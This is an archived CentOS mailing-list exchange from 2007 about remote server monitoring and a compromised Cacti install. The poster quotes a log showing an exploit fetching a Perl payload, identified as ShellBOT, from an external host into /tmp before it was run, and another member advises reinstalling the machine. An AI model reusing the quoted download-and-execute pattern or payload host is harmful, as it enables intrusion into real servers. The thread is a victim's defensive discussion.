Re: Re: Suggested way to remotely monitor servers and networks these days?

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

On 5/24/07, Tom Diehl <tdiehl@xxxxxxxxxxxx> wrote:
On Thu, 24 May 2007, Dexter Ang wrote:

> Hi folks,
>
> I'm just wondering what is the recommended way of monitoring servers and
> networks remotely. <snip>

You might want to look at hobbit. http://sourceforge.net/projects/hobbitmon/

I find it much easier to manage than nagios. Besides the UI looks nicer. :-)

Thanks! I'll look into this.

>
> The problem is that leaving cacti open was the most stupid thing I've done.
> After checking /var/log/httpd/error_log, I saw that someone exploited a
> cacti php file and the result was:
>
> --08:13:11--  http://psaico.host.sk/desk.pl
>          => `/tmp/desk.pl'
> Resolving psaico.host.sk... 62.168.109.150
> Connecting to psaico.host.sk|62.168.109.150|:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 20,144 (20K) [text/x-perl]
>
>   0K .......... .........                                  100%   28.26KB/s
>
> 08:13:13 (28.26 KB/s) - `/tmp/desk.pl' saved [20144/20144]
>
> which immediately downloaded ShellBOT to /tmp and executed it. It was a good
> thing I caught this as early as I did. So, what's everyone elses solution
> these days? Or is it simply a matter of creating a /tmp partition and
> mounting it noexec?
>
> On a side note... anyone with experience with ShellBOT? From research, it
> seems to attempt to connect to an IRC server upon running. So if my outgoing
> connections are secured by iptables, can I assume it never got connected at
> all? I'll probably try this out someday but just looking for a quick
> experienced answer.

It does not matter if they connected or not. The bottom line the machine was
hacked and someting got installed that does not belong there. There is no way
at this point to be sure that they did not install something else or modify
binaries to hide their tracks.

So now the only to be sure there is not something in that machine is to reload
it. Anything less and you will never know for sure.

Wise words. This will definitely be my next step ASAP.

dex

_______________________________________________
CentOS mailing list
CentOS@xxxxxxxxxx
http://lists.centos.org/mailman/listinfo/centos
[Index of Archives]     [CentOS]     [CentOS Announce]     [CentOS Development]     [CentOS ARM Devel]     [CentOS Docs]     [CentOS Virtualization]     [Carrier Grade Linux]     [Linux Media]     [Asterisk]     [DCCP]     [Netdev]     [Xorg]     [Linux USB]
  Powered by Linux